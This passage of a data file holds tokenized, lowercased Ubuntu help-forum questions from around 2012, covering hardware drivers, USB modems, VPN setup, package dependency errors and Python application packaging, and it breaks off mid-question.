162067	need identify path of my usb device	have any usb device bus 001 device 002 : id 0c45:63e0 microdia sonix integrated webcam bus 005 device 004 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 005 device 003 : id 04f2:0841 chicony electronics co. , ltd bus 002 device 007 : id 0525:3424 netchip technology , inc. and i need discovery path to device ( bus 002 device 007 ) respond . i try send data to /dev/bus/usb/002/007 but is not configured . which port should i send my data to communicate with usb device ? ?
162070	easiest language to develop tcp server on ubuntu ?	i would like to ask about the easiest way to develop a tcp-server on ubuntu : )
162073	what prevents setting ati / radeon power_profile from boot and retaining it after suspend ?	i 'm successfully using the open source radeon driver and use kms-power_profiles ( see link below ) for power management of my graphics to prevent overheating . but i ca n't manage to set the power_profile on boot and retain it after suspend - so i have to do it manually every time i start up or wake up my laptop . several questions about setting it at boot were posed at askubuntu and elsewhere and i 've tried every way described without success . i 'm new to ( ubuntu ) linux but believe i followed the instructions correctly . since i can not comment on the answers as a new users and hours of research on the web did n't help i 'm posting this as a new question . please help : ) i 'm using : ati mobility radeon hd 4250 ( family r600 ) on ubuntu 12.04 x64 with gallium 0.4 on amd rs880 = the default open source driver , that came with the installation . the method most often described is putting echo profile > /sys/class/drm/card0/device/power_method echo low > /sys/class/drm/card0/device/power_profile in /etc/rc.local before exit 0 after doing this i can prove that rc.local is being executed ( inserted a command to create a directory which worked ) , but cat /sys/class/drm/card0/device/power_profile returns high instead of low . again , setting the power_profile manually as root ( even executing rc.local directly ) does work . but even then the setting is reverted to high after waking up from suspend . other ways i 've tried without success : installing the sysfsutils package and adding a rule to the /etc/sysfs.conf file putting a script in /etc/init.d/ is there any reason you could think of that prevents setting radeon power_profile from boot and retaining it after suspend ? could there be another process overriding my settings ? thank you for your help ! p.s . i do n't want to use the proprietary driver for power-management because it brings along other severe problems . references : x.org reference for kms power management how to set power_profile at boot tweaks and configuration for radeon open source driver gnome 3 ati fan always on ubuntu open source ati radeon driver power usage tweaks
162074	how do i configure libfitbit ?	to use ubuntu to upload fitbit data you need libfitbit which is available as ppa now . however i could n't find configuration instructions . i also wonder if cuttlefish could help to get the same functionality as on os/x : stick the stick in and get the upload going ?
162075	my computer boots to a black screen , what options do i have to fix it ?	i am trying to boot ubuntu on my computer . when i boot ubuntu , it boots to a black screen . how can i fix this ? table of contents : if you are trying to install ubuntu if you have a dual boot system if an update or something else caused your problem
162082	how to avoid dark colour of some programs in lxde no matter the theme ?	changing the theme in my lxde ( that now i use although my main installation is xubuntu 12.04 ) does n't change the appearance of certain main programs - always dark . why is that and how can i alter it ? i tried changes in 'custimize look and feel ' and 'openbox configuration manager ' to no avail . i have a lot of themes that i tested before asking the question . and there are many others , none changing anything . funny . only a limited number of programs are concerned , and i can not tell what they have in common ( java ? kde ? ) . beside vlc , smplayer and qbittorrent that are more commonly used , searching randomly , i found only a few others : clementine , gwenview , k3b , kdenlive .
162086	beginner 's guide to configure vpn to work in windows 7 ?	i 'm trying to configure one of my machines to serve as a vpn and through it connect using windows 7 . i installed pptp followed all the instructions but it keeps giving me error 619 . i verified the ports and i allowed port 1723 in both tcp and udp so i 'm quite unsure what 's left to do is there a guide that has completely worked for you ?
162091	google desktop search replacement in gnome classic ?	my employer uses gnome classic on her ubuntu laptop . until it was discontinued , she used google desktop search , and is now looking for a replacement . i ca n't find an acceptable one , can someone help please ? it should have the following attributes : works in gnome classic ( non-negotiable ) searches local files and their contents , indexes quickly searches google , gmail preferably customizable to add additional functionality ( like wikipedia searching , etc )
162092	how do i change background color of the desktop icon font ?	how to i change background color of the desktop icon font ? the font is white and font background is darkgray . i want to set the background color to transparent .
162102	how do i install and use openvpn ?	i am hoping to take my desktop computer , which is currently running the desktop version of ubuntu , and instead run ubuntu server . once the server is setup and running properly , i should be able to follow this tutorial http : //madisonlinux.org/installingopenvpnonubuntu10.04 , which i believe allows me to connect securely with my windows-based laptop . so if anyone can tell me , which server i should install , and how to install it that would be awesome . i am assuming there is already a tutorial on these forums already saying how to do this , but unfortunately , after trying 3 different searches , i was unable to find it . so feel free to add a link to this thread , which tells me how to take my ubuntu desktop and make it a ubuntu server .
162103	save inkscape figure in 400dpi ( png or jpeg )	i 'm a difficulty in ubuntu . i need to save a figure work of inkscape in png or jpeg format , however , this figure work needs to be 400dpi resolution . i saved the jpeg using output pro inkscape plugin , but i can not insert the image into libreoffice writter ( i think the reason is that the image was very extensive , but i am obliged to do so , because my university has the using standard figures 400dpi ) .
162104	ubuntu installation accuses false raid	i 'm trying to install a ubuntu 12.04/win7 dual boot on my machine ( with 2 750gb hds ) . problem is , during the partitioning , the installation says i 'm using raid , and shows only one hd , with 1.5tb . i have , however , disabled raid on the setup , and installed windows 7 only on hd 1 , and want to keep ubuntu to hd 2 . i 'm afraid to `` resize '' the partitions using the installer since that could mess my win7 installation . i did try to use the alternate installer , but had the same results .
162110	blu-ray player ?	i 'd like to play bluray discs in my laptop . i found the official documentation , and there it 's explained that one should use mplayer and ffmpeg . looking at the repositories , there exist two different mplayer packages ( in conflict with each other ) mplayer mplayer2 any ideas with of them should i install ? on the other hand the official documentation seems to be out of date since no mention to ubuntu after 9.04 is done . does the dumphd package from the repositories work ? finally , where could the keydb.cfg keys be found ? i 'm open to suggestions , specially of people who had done the job of making it work . cheers
162117	picasa ? an alternative	is there a recommened alternative to picasa for an amateur such as myself . i used and liked picasa immensely on my old windows and now that it is not available for ubuntu i would like to know if a good alternative exists thanks simon
162129	what cd/dvd burning software should i use ?	i have tried countless cd/dvd burning software on ubuntu 12.04 and none of them work for me , any ideas guys ? i 've tried tovidgui , bombono dvd , and mestelix , they are all so very confusing is there any program like dvdflick that is just straight to the point ?
162133	find version of development library from command line ?	i installed the c++ boost development libraries using ubuntu software centre . the problem is that it was quite a long time ago and i can not remember where they are installed nor what version they were . is there anything i can do from the command line that will tell me what version ( s ) i have installed on my system ? ? i know i can do things like gcc -v to get version of an application but is there a similar thing available for libraries ? i am using ubuntu 12.04
162136	/boot partition is ntfs on dual-boot win7/ubuntu 12.04 desktop	i recently purchased an acer aspire laptop . windows 7 home premium edition was installed on the main drive . i booted to the ubuntu 12.04 installation environment and selected the option to install ubuntu alonside windows 7 . i now have two data partitions roughly half the size of the hd ( ntfs and ext4 ) and a /boot partition that is ntfs . how can i convert the /boot partition to ext without breaking ubuntu and windows 7 ? i would like to tri-boot it with another environment if possible , but this is presenting a problem .
162141	map ctrl and alt to mouse thumb buttons	i 'm running ubuntu 12.04 and have a multi-button microsoft mouse . i would like to map the ctrl and alt modifier keys to the left and right thumb buttons of my mouse , respectively , so i can ctrl-click and alt-click without touching the keyboard . my thumb buttons are buttons 8 and 9 . i tried the solution in how do i configure a mouse thumb button ? which explained how to map a double click to a thumb button - this worked for the double-click but i could n't figure out how to modify the solution for ctrl and alt i also tried how to map ctrl/shift to thumb buttons of mouse ? which used xdotools and xbindkeys . i modified the script to this : ~/.xbindkeysrc : '' xdotool keydown alt '' b:9 '' xdotool keyup alt '' release + alt + b:9 '' xdotool keydown ctrl '' b:8 '' xdotool keyup ctrl '' release + control + b:8 which almost works . it simulates a ctrl-key press when i click the left thumb button , but i ca n't actually hold the button and click at the same time - holding the thumb button seems to prevent it from listening to other input until it is released . does anyone know how i can make my mouse thumb button actually work as a modifier key , so i can use thumb_button+click instead of ctrl-click ?
162142	inserted dvd disc not recognized	i was trying to watch a dvd on my ubuntu laptop , however , whenever i insert the disc , the cd/dvd drive icon on the computer pane disappears , seems that it can not detect what type of disc was inserted . i am running on ubuntu 12.04 lts and new to these things as i used to be comfortable with windows doing the things for me . immediate help will be appreciated as i just borrowed this dvd from a mate who allowed me to watch it until i finish the episodes inside the cd .
162148	virtualbox machine boots to efi shell	i recently transferred a virtualbox machine from my laptop to my recently reinstalled desktop . the image works fine on my laptop , but when i try to boot it on my new machine , i get dumped to an `` efi shell '' where it asks me about my hard drives rather than booting the machine . i want it to boot to the actual machine image rather than this shell . how can i fix this ?
162152	can not boot into ubuntu after installing ubuntu 12.04 ( with windows 7 on another partition )	i just installed ubuntu on my desktop which had windows 7 installed on it . when i restart the machine after completing the installation , it directly loads windows , i do n't see the grub menu . i tried using boot-repair using the livecd ( both recommended fixes and fixing the mbr ) , it did not help . what am i missing ? i have done this at least 5 other times , on different machines , and have never faced this issue before .
162153	how to make my microphone unmuted on startup ?	every time i boot the microphone is muted . i want it to be unmuted instead . of course i can do it by 6 easy steps every time : press sound icon in the upper right of the screen . press `` sound settings ... '' item in the bottom . wait about 10 seconds until a window loads . switch to input tab . uncheck `` mute '' checkbox near a microphone icon . close the window . but i want it to be unmuted by default . i guess that in linux world this should be changing 0 to 1 in some line in some configuration file , but i do n't really know , where is this line located .
162154	how can i get the huawei e160 modem to work on 12.04 ?	i 've got problem with e160 on ubuntu 12.04 . i ca n't configure network manager and connect because nm ca n't see the e160 . i 've tried lot of solutions with no result . ateusz @ mateusz-aspire-5738 : ~ $ sudo usb_modeswitch -v 0x12d1 -p 0x1003 -h [ sudo ] password for mateusz : alooking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 002 on bus 001 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x01 ( out ) and 0x82 ( in ) not a storage device , skipping scsi inquiry usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei technology product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - sending huawei control message ... ok , huawei control message sent - > run lsusb to note any changes . bye . dmesg : [ 521.480062 ] usb 1-4 : reset high-speed usb device number 4 using ehci_hcd [ 521.617792 ] option 1-4:1.1 : gsm modem ( 1-port ) converter detected [ 521.617945 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 521.618062 ] option 1-4:1.0 : gsm modem ( 1-port ) converter detected [ 521.618232 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 530.840276 ] option : option_instat_callback : error -108 [ 530.840455 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 530.840484 ] option 1-4:1.0 : device disconnected [ 537.680378 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 537.680398 ] option 1-4:1.1 : device disconnected [ 537.792088 ] usb 1-4 : reset high-speed usb device number 4 using ehci_hcd [ 537.929549 ] option 1-4:1.1 : gsm modem ( 1-port ) converter detected [ 537.929702 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 537.929818 ] option 1-4:1.0 : gsm modem ( 1-port ) converter detected [ 537.929993 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 547.224294 ] option : option_instat_callback : error -108 [ 547.224470 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 547.224511 ] option 1-4:1.0 : device disconnected [ 556.988066 ] tty_ldisc_hangup : waiting ( usb-storage ) for ttyusb0 took too long , but we keep waiting ... [ 558.990663 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 558.990698 ] option 1-4:1.1 : device disconnected [ 559.100068 ] usb 1-4 : reset high-speed usb device number 4 using ehci_hcd [ 559.241293 ] option 1-4:1.1 : gsm modem ( 1-port ) converter detected [ 559.241446 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 559.241565 ] option 1-4:1.0 : gsm modem ( 1-port ) converter detected [ 559.241739 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 568.728283 ] option : option_instat_callback : error -108 [ 568.728466 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 568.728496 ] option 1-4:1.0 : device disconnected lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 064e : a103 suyin corp. acer/hp integrated webcam [ cn0314 ] bus 005 device 002 : id 09da : c20a a4 tech co. , ltd bus 001 device 002 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem
162157	webmin no longer works - connection rejected	i 've had webmin installed on my 12.04 server and everything has been fine until recently . now when i navigate to https : // myip:10000 i get a message saying the connection attempt is rejected . the last thing i did was set up a cron job to start utorrent webui . i tried reinstalling but no change . when i check with netstat i see a webmin entrance on port 10000 . i 've also reset the iptables and allowed everything . i 'm at a loss as to what to do now .
162158	no right-click behavior under 12.04 for rabbitvcs	i 've followed all the instructions for installing rabbitvcs and am running nautilus3 but do not get right-click svn options ( i believe it worked under 10.10 ) . i should add that i 'm running 12.04 under vmware fusion . any suggestions ( i 've searched the web but no luck ) .
162159	how do i make the official jdk version the default java ?	i 've got the following in /.bashrc export java_home=/usr/bin/jdk1.7.0_03/ export path= $ path : /usr/bin/jdk1.7.0_03/bin this is fine , if i do $ java_home i get the directory above . the problem is if i do java -version i get ... openjdk runtime environment ( icedtea6 1.11.1 ) ( 6b24-1.11.1-4ubuntu3 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) how do i make the official jdk version the right one ?
162160	how do you test multiple speakers in ubuntu distributions ?	i need to test the output of all speakers in a 5.1 system that runs 10.04 and 12.04 ubuntu ? how do i do that ?
162164	how to pinpoint source of firefox window behavior	one of my favorite unity features is the ability to pin windows to one side of the screen or the other . my tendency to do this a lot has made me notice a bug where when i 'm moving a firefox window i get the clenched fist and even after letting go of the window the pointer never returns to normal . after this i 'm unable to use the mouse normally until i do a killall firefox from the terminal . how do i pinpoint the source of this error since i can not reliably reproduce it , and i 'm not sure of all of the systems that might be involved ? firefox 13.01 seen on both ubuntu 10.04 and 12.04
162166	`` freetype notfound '' error when trying to build okular from source	i am trying to build okular from source . i checked out commit 8ab768 from tue jul 10 17:45:23 2012 +0100 . however , freetype seems to be missing in some path variable . here is the output from cmake . $ cd ~/src/okular/build $ cmake ../ -dcmake_install_prefix=~/okular-install -dcmake_build_type= '' debug '' -- found qt-version 4.8.1 ( using /usr/bin/qmake ) -- found x11 : /usr/lib/x86_64-linux-gnu/libx11.so -- found kde 4.8 include dir : /usr/include -- found kde 4.8 library dir : /usr/lib -- found the kde4 kconfig_compiler preprocessor : /usr/bin/kconfig_compiler -- found automoc4 : /usr/bin/automoc4 -- warning : you are using the obsolete 'pkgconfig ' macro , use findpkgconfig -- found freetype : -l/usr/lib/x86_64-linux-gnu -lfreetype -lz -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- the following external packages were located on your system . -- this installation will have the extra features provided by these packages . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - * qimageblitz - an image effects library * libspectre - a postscript rendering library * chm - a library for dealing with microsoft itss/chm format files * djvulibre - a library for dealing with djvu formatted files * libtiff - a library for reading and writing tiff formatted files , * freetype - a font rendering engine * jpeg - a library for reading and writing jpeg image files . * zlib - the zlib compression library * libepub - a library for reading epub documents * qca - qt cryptographic architecture ( qca ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- the following optional packages could not be located on your system . -- consider installing them to enable more features from this software . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - * poppler-qt4 ( 0.12.1 or higher ) < http : //poppler.freedesktop.org > a pdf rendering library support for pdf files in okular . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : freetype_include_dir ( advanced ) used as include directory in directory /home/john/src/okular/generators/dvi -- configuring incomplete , errors occurred ! i already tried to set the environment variable as follows . $ export freetype_include_dir=/usr/include/freetype2/freetype however , it seems to have no effect . i am using ubuntu 12.04 . the repository for okular is available via git under git : //anongit.kde.org/okular .
162167	how do i create a vpn connection using only the terminal ( ssh ) ?	i am trying to create a vpn connection for my ubuntu server machine to use . i only have access via ssh terminal session . i have seen many articles detailing how to connect to an existing connection , but none about creating a new connection . i am using ubuntu server 12.x
162172	wine ppa dependency problems after upgrading to 12.04	i recently upgraded my ubuntu up to 12.04 . untill that , i ca n't use synaptic at all . after trying to repair the issue through synaptics , it returns me : installarchives ( ) failed : dpkg : dependency problems prevent configuration of wine1.4-i386 : i386 : wine1.4-i386 : i386 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-i386 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4 : wine1.4 depends on wine1.4-amd64 ( = 1.4-0ubuntu4 ) ; however : version of wine1.4-amd64 on system is 1.4.1-0ubuntu1~precise1~ppa3 . wine1.4 depends on wine1.4-i386 ( = 1.4-0ubuntu4 ) ; however : no apport report written because maxreports is reached already no apport report written because maxreports is reached already package wine1.4-i386 is not installed . version of wine1.4-i386 : i386 on system is 1.4.1-0ubuntu1~precise1~ppa3 . dpkg : error processing wine1.4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4 ) ; however : package wine1.4 is not configured yet . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-amd64 : wine1.4-amd64 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : wine depends on wine1.4 ; however : package wine1.4 is not configured yet . dpkg : error processing wine ( -- configure ) : dependency problems - leaving unconfigured dpkg : depeno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ndency problems prevent configuration of playonlinux : playonlinux depends on wine | wine-unstable ; however : package wine is not configured yet . package wine1.4 which provides wine is not configured yet . package wine-unstable is not installed . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : wine1.4-i386 : i386 wine1.4 wine1.4-common wine1.4-amd64 wine playonlinux error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of wine1.4 : wine1.4 depends on wine1.4-amd64 ( = 1.4-0ubuntu4 ) ; however : version of wine1.4-amd64 on system is 1.4.1-0ubuntu1~precise1~ppa3 . wine1.4 depends on wine1.4-i386 ( = 1.4-0ubuntu4 ) ; however : package wine1.4-i386 is not installed . version of wine1.4-i386 : i386 on system is 1.4.1-0ubuntu1~precise1~ppa3 . dpkg : error processing wine1.4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : wine depends on wine1.4 ; however : package wine1.4 is not configured yet . dpkg : error processing wine ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4 ) ; however : package wine1.4 is not configured yet . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-amd64 : wine1.4-amd64 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-i386 : i386 : wine1.4-i386 : i386 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-i386 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on wine | wine-unstable ; however : package wine is not configured yet . package wine1.4 which provides wine is not configured yet . package wine-unstable is not installed . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured i tried the following : sudo apt-get clean sudo apt-get autoclean sudo apt-get install -f and returnsme : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : wine1.4 wine1.4-common suggested packages : dosbox the following packages will be upgraded : wine1.4 wine1.4-common 2 upgraded , 0 newly installed , 0 to remove and 110 not upgraded . 6 not fully installed or removed . need to get 0 b/1,126 kb of archives . after this operation , 9,216 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of wine1.4-i386 : i386 : wine1.4-i386 : i386 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-i386 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4 : wine1.4 depends on wine1.4-amd64 ( = 1.4-0ubuntu4 ) ; however : version of wine1.4-amd64 on system is 1.4.1-0ubuntu1~precise1~ppa3 . wine1.4 depends on wine1.4-i386 ( = 1.4-0ubuntu4 ) ; however : package wine1.4-i386 is not installed . version of wine1.4-i386 : i386 on system is 1.4.1-0ubuntu1~precise1~ppa3 . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : error processing wine1.4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4 ) ; however : package wine1.4 is not configured yet . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-amd64 : wine1.4-amd64 depends on wine1.4-common ( = 1.4.1-0ubuntu1~precise1~ppa3 ) ; however : version of wine1.4-common on system is 1.4-0ubuntu4 . dpkg : error processing wine1.4-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : wine depends on wine1.4 ; however : package wine1.4 is not configured yet . dpkg : error processing wine ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on wine | wine-unstable ; however : packagno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already e wine is not configured yet . package wine1.4 which provides wine is not configured yet . package wine-unstable is not installed . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : wine1.4-i386 : i386 wine1.4 wine1.4-common wine1.4-amd64 wine playonlinux e : sub-process /usr/bin/dpkg returned an error code ( 1 ) cna anyone helpme ? i 've been searching for a sollution for days and still ca n't solve it . thanks ! pablo
162173	how to run dual monitor with optimus	i have reinstalled ubuntu 12.04 to make a new attempt in getting the dual monitor working with my nvidia optimus . i already installed bumblebee . but still it is n't working as it should . the monitor from the laptop has not the right configuration and neither has the external monitor ( which runs with vga ) . and if i try to change the resolution i get black screens and ca n't do anything against it . if i reboot though the old settings are back . i have searched a lot for a solution and tried quite a few things but nothing has changed . any ideas what i can do to get this thing working ?
162174	how do i use unetbootin to make a bootable windows usb installer ?	it says missing bootmngr or something like that . i 'm on ubuntu 12.04 or whatever , the newest one using the gparted to format to ntsc and then unetbootin to install the bootloader , and the iso , then restart . also , i do not know how to use terminal or code..and im also using an external hardrive because this laptop is missing one ...
162178	evolution : broken outbox / sending mail takes several minutes	when i send a mail , it takes several minutes ( ~20 ) to finish this task . i can see a status bar item , percents increasing . i would n't mind much ; the problem is that until it 's done , i ca n't see the mail in the sent folder and ca n't work with it . this behavior started without any reconfiguration . other users of the same mail server do not experience this trouble . how can i fix this ? versions : ubuntu 11.04 evolution 2.32.2 update : i found out that the messages are actually staying in outbox and not outgoing at all if one particular smtp server is used . when i tried to `` flush '' the outbox , it shown `` sending ... '' , but nothing changed nor was sent . when i try to `` expunge '' outbox , evolution says : mbox file corrupted , expected from : but did n't find . and later summary and folder mismatch , even after a sync any idea how to fix this ? preferably without need to drop & set up everything anew . and where does evolution store it 's .mbox files ? ~/.evolution does not exist . ~/.gconf/apps/evolution/ only contains configuration .
162179	how do i install ubuntu to another partition from ubuntu with unetbootin ?	basically what i want to do is install a fresh copy of ubuntu from ubuntu . it is an older machine so usb boot does n't work and i do n't see why i need to waste a cd to do it . currently running ubuntu 11.10 . i have a 1tb drive and a second 500gb drive for backup . the 1tb drive is partitioned as : 20gb sda1 windows xp 20gb sda3 free for new os ~800gb sda4 data ( ext3 ) 60gb sda7 /home ( ext4 ) 20gb sda6 / ( ubuntu 11.10 ext4 ) 2gb sda5 swap after researching i decided that using unetbootin was the best option . i chose hard disk ( frugal install ) and the only option for which disk is `` / '' . that worked and i quickly rebooted into ubuntu 12.04 live . chose to install and picked custom options , set sda3 for / and sda7 for /home . the installer started but hit a wall at detecting other operating systems . it was trying to mount sda6 to find out about the existing os 's on the machine , for the purpose of installing grub . and it could n't umount sda6 because that was currently mounted as cd drive for live cd . i could n't find an option to make the installer skip this step ( i could later fix the grub in 11.10 ) . i have another drive with 4gb free partition and if i could get unetbootin to install to there it would all work . so my question is - how do i get unetbootin to install to a different disk for hard-disk install ? ( i do n't think usb drive mode will work because it will install the grub to that disk - but i might be wrong ! ) or how to fresh install ubuntu from ubuntu ?
162180	is there a restore counterpart to gvfs-trash ?	i 've used gvfs-trash to move an item to trash from a command-line . is there a way to restore such a file from the command-line ? i 've checked other gvfs binaries and do n't see one that makes sense ? i know there are other projects out there that are devoted to implementing the freedesktop.org trash spec . i 'm interested a gvfs approach .
162183	what is a good folder structure for multi-platform distribution of a python application ?	sorry about the wall of text , but i am trying to provide a good background to my question . actually , there are like a million questions here because i am utterly confused . i recently learned some python programming and made a windows application . now i want to implement that app and a few other ideas for ubuntu and release them as open source gpl-3 . although , i would like to keep the code possible to run on any system ( or at least both ubuntu and windows ) . so to learn how ubuntu packaging works , i 've looked at the quickly application used in the app developer showdown recently . but the folder structure and the files it creates makes no sense at all to me . so i read the ubuntu packaging guide and the applicaton review process with all the links there , as well as the debian python policy . but all that text just worked to make me more confused about the way quickly creates files and folders . the quickly way ? so , this is what i understand from quickly ( assuming my project name is proj ) : proj/bin = one single file that will be copied to /usr/share/bin/proj.py to enable running the app from a global path ? but that would be in violation of the `` application review process '' rules , right ? proj/data/* = files that should go under /usr/share/proj/* , right ? but that would also be in violation of the `` application review process '' rules ? proj/help/c/* = some html documentation , i think , which should go under /usr/share/doc/proj/ and that works well with `` application review process '' , but why is the folder name `` c '' and not just `` proj '' ? proj/tests/ = some sort of files for a `` test '' package within python . i guess this is great , looking forward to learn what it is . proj/proj/ = some files that just seem to link to new files in the proj_lib folder ? seems unnecessary , and i do n't understand why these are here at all . proj/proj_lib/ = the actual source code , i guess ? then quickly also creates proj/apport and proj/etc/apport* which i have no idea what they do or why they are added . now , the really confusing part is the file structure . it looks like nothing i have seen before . and to be honest , it looks very complicated in an unnecessary way . below this section i will describe the way i would make my own project file structure , which may help describe why this is so confusing to me . but first , my understanding of the quickly way ( note that my understanding may be wrong at this point ) . first of all , the setup.py . this file contains a function called update_config ( ) which just loads another file called proj/proj_lib/projconfig.py . but that config.py-file does n't seem to contain anything that would be useful to keep separate from the setup.py ? actually , there are a lot of things that i 've never seen anyone suggest to put in a setup.py-file before . the setup.py also contains a hard coded file name pointing to the svg icon , and otherwise just copies the desktop.in-file on itself so why not just have the changes made directly in the desktop.in-file without this function in setup.py ? then there is another function to create a subdirectory proj/data/share/proj and copy the desktop.in-file there , which i do n't understand the purpose of ? why have a function that does that when you can just have the file there originally ? then after all of this nonsensical code comes something that actually looks like a regular setup.py . now the proj/bin/proj.py , which i assume is supposed to be used to start the application ? this just seems to remap /usr/ to /opt/extras.ubuntu.com/ in a previously undeclared syspath variable . so i guess this is to accomodate the rules in the `` application review process '' for apps that are using folder names standard for all other linux flavors ? fair enough , i do n't understand it but i can live with that . after this remapping of directories , this file goes on to call on proj/proj/init.py . proj/proj/__init__.py is the standard way to define how to start a module , i guess ? but instead of having some code which actually does something , this file just goes on to in turn run the main window class , which is located in yet another file . proj/proj_lib/ also has an init.py-file which i do n't understand the purpose of . then there is a window.py which seems to contain the actually functionality of the application , and calls other window py-files like about dialog etc . the way i did my app my folder structure looks like this : proj/ proj/ui proj/imageformats # necessary for imports to work proj/sqldrivers # necessary for imports to work in the proj/ folder i have my setup.py and my proj.py which starts my app . in my proj.py file i have all the main window functionality , calling some other windows and functions with imports , and at the end of this file is the main ( ) function which starts the app . the proj/ui/ folder contains all my .ui files made with qt designer . the other folders are just there to provide some files which will make the application work when packaged with py2exe for windows . basically , they are the files that would be provided through dependencies in ubuntu . note that this setup i have works great for windows development . i use py2exe to build an executable that ends up in a proj/dist/ folder , and i can just copy the files in this folder and it will work on any windows machine . how do i combine this ? i have spent a few days trying to read documentation . there is hardly anything i can find on quickly , except the basic tutorial and the stuff on app developer showdown workshops . i ca n't find anything there that helps me make sense of the folder structure suggested by quickly . from what i have read , i could use os.environ [ 'home ' ] to create a path to ~/.config/proj.conf on ubuntu or c : /users/username/.config/proj.conf on windows . that far i can keep to cross platform code . but then 